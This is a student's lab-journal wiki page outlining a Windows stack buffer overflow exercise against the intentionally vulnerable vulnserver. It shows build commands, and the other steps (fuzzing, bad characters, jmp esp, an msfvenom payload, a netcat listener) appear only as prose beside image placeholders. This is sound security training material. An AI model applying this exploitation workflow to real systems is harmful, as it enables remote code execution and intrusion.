7.1 Windows Buffer Overflow - JadenGil/Jaden-Tech-Journal GitHub Wiki

Method 2:

Windows 10 Machine installed with no network activity:

Deliverable 1:

image

On the Kali box, we need to get the vulnserver which can be done with the commands sudo apt update followed by sudo apt install -y mingw-w64.

Then we need to do the following:

git clone https://github.com/stephenbradshaw/vulnserver
cd vulnserver
i686-w64-mingw32-gcc -c essfunc.c


i686-w64-mingw32-gcc -shared -o essfunc.dll -Wl,--out-implib=libessfunc.a -Wl,--image-base=0x62500000,--disable-dynamicbase essfunc.o -static-libgcc -static-libstdc++ 

i686-w64-mingw32-gcc vulnserver.c -o vulnserver.exe -lws2_32 ./libessfunc.a

The following should now be in the vulserver directory:

image

To move vulnserver.exe and essfunc.dll to the Windows box I started an HTTP sever on the kali box like so:

image

Then I navigated to the website on the Windows box using Google and downloaded the files needed:

image

Then in an administrator powershell session enter the following:

image

Install Immunity debugger:

https://github.com/kbandla/ImmunityDebugger

immune

Then run vulnserver:

image

Using Nmap on the kali box we can test the connection between the 2 machines:

Deliverable 2:

image

Deliverable 3:

image

And using wget we can download mona.py

Move it into the vulnserver dir and we can download the file on the windows machine using an HTTP server

image

Then we move it into the directory seen in the screenshot below:

image

Deliverable 4:

image

Run fuzzer.py:

image

This was the output after running fuzzer on immunity debugger:

Deliverable 5:

image

On the Kali box update the fuzzer file with badchars:

image

Running the code will output this on the kali machine:

image

And on the Windows box this is the output on the debugger:

image

On the Kali box run msf-nasm_shell and once in enter jmp esp and you should get the following output:

image

Deliverable 6:

image

Now we want to restart the debugger (In the debugger select debug -> restart) then select "run"

Then back on the Kali box we want to type the following msfvenom command into the command line:

image

And you should get the following output:

image

Then we want to make the following edits to fuzzer:

image

Then we start a netcat session on 4448:

image

Deliverable 7:

image